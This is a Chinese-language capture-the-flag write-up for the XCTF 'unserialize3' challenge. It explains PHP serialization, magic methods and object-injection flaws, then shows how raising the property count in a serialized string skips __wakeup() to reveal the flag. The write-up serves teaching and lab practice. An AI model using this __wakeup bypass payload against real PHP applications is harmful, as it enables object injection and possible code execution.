攻防世界Web篇——unserialize3

知识点:

序列化与反序列化

*:    序列化(serialization)在计算机科学的数据处理中,是指将数据结构或对象状态转换成可取用格式(例如存成文件,存于缓冲,或经由网络中发送),以留待后续在相同或另一台计算机环境中,能恢复原先状态的过程。


简单的说,序列化是将变量转换为可保存或可传输的字符串的过程。而反序列化是在适当的时候吧这个字符串再转化成原来的变量使用。


php的序列化和反序列化

php的序列化和反序列化由serialize()和unserialize()这两个函数来完成
serialize()完成序列化的操作,将传入的值转换为序列化后的字符串
而unserialize()完成反序列化的操作,将字符串转换成原来的变量

serialize()函数将一个对象转换成字符串时,其返回的字符串有一定规则:

比如:O:4:"xctf":1:{s:4:"flag";s:3:"111";} 表示序列化的是一个对象,对象所在类名是"xctf"、类名的长度为4,该对象有一个属性,属性名为一个长度为4的字符串"flag"、该属性值为一个长度为3的字符串"111"

注意:
① 当属性为private属性时,它会在两侧加入空字节,导致其长度会增加2
② 序列化对象时只会序列化对象中的属性值,不会序列化其中的函数
魔术方法

PHP中以两个下划线开头的方法,__construct(), __destruct (), __call(), __callStatic(),__get(), __set(), __isset(), __unset (), __sleep(), __wakeup(), __toString(), __set_state,() __clone() __autoload()等,被称为"魔术方法"(Magic methods)。这些方法在一定条件下有特殊的功能

与序列化和反序列化的魔术方法主要是:

1 __construct()    //当一个对象创建时被调用
2 __destruct()     //对象被销毁时触发
3 __wakeup()     //使用unserialize时触发
4 __sleep()     //使用serialize时触发
5 __toString()     //把类当做字符串时触发
6 __get()     //用于从不可访问的属性读取数据
7 __set()     //用于将数据写入不可访问的属性


PHP反序列化漏洞

php反序列化漏洞又称对象注入,可能会导致注入,远程代码执行等安全问题的发生

php反序列化漏洞如何产生:

如果一个php代码中使用了unserialize函数去调用某一类,该类中会自动执行一些自定义的魔法方法,这些魔法方法中如果包含了某一些危险的操作,或者这些魔法方法回去调用类中带有危险操作的函数,如果这些危险操作时我们可控的,那么就可以进行一些不可描述的操作了

攻防世界Web篇——unserialize3

打开靶机,发现一段代码,__wakeup()会直接退出然后返回bad request,下面?code=提示我们可以用url绕过__wakeup()

查资料知:当序列化字符串当中属性个数值大于实际的属性个数时,就会导致反序列化异常,从而跳过__wakeup函数

这里我们写一段php代码,先将原来代码序列化

 1 <?php
 2 
 3 class xctf
 4 {
 5     public $flag = '111';
 6     public function __wakeup(){
 7         exit('bad requests');
 8     }
 9 }
10 $a = new xctf();
11 $b = serialize($a);
12 echo $b;
13 ?>

得到
O:4:"xctf":1:{s:4:"flag";s:3:"111";}

将1改成大于一个任意数字

攻防世界Web篇——unserialize3

 

 得到flag

 

以上wp参考于:https://blog.csdn.net/silence1_/article/details/89716976

 

上一篇:.NET开发者必须学习.NET Core


下一篇:[MRCTF2020]Ezpop复现